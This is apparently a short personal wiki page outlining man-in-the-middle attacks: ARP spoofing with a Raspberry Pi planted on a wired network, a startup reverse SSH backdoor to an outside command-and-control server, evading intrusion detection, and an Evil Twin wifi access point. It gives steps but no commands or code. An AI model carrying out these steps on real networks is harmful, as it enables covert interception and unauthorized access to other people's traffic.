What It Is

A man-in-the-middle attack is a general concept from encryption. It consists of two parties, Alice and Bob, trying to have an encrypted conversation. However, it is foiled by an attacker, Eve, who gets in the middle. This means that Alice and Eve communicate with one encryption key, while Bob and Eve communicate with another key.

Wired Network

Trying Man in the Middle attack with ARP spoofing on a wired network. The configuration:

+----[Target laptop]
|
|      +---[Raspberry Pi]
|      |
|      |
[Router]

How It Will Work

This (wired) man in the middle attack will work by using the Pi to spoof the MAC address of the target.

Preparing the Pi

First, plug the Pi into the router.

Getting a Reverse Shell to the Pi

See RaspberryPi/Reverse SSH page for instructions on creating a startup executable on the Raspberry Pi that will create a reverse SSH connection to an outside command and control server. This gives you a backdoor ssh shell onboard the Raspberry Pi. Hooray!

Circumventing IDS

Intrusion detection systems can detect SSH traffic based on the traffic looking different, regardless of what port.

Wireless Network

To conduct a man-in-the-middle attack over wifi, we'll need to set things up in one of a couple of different ways.

I'll cover the EvilTwin attack, where an attacker fakes being an access point in order to trick a sheep into connecting to it. This creates a scenario in which the attacker may successfully carry out a man-in-the-middle attack.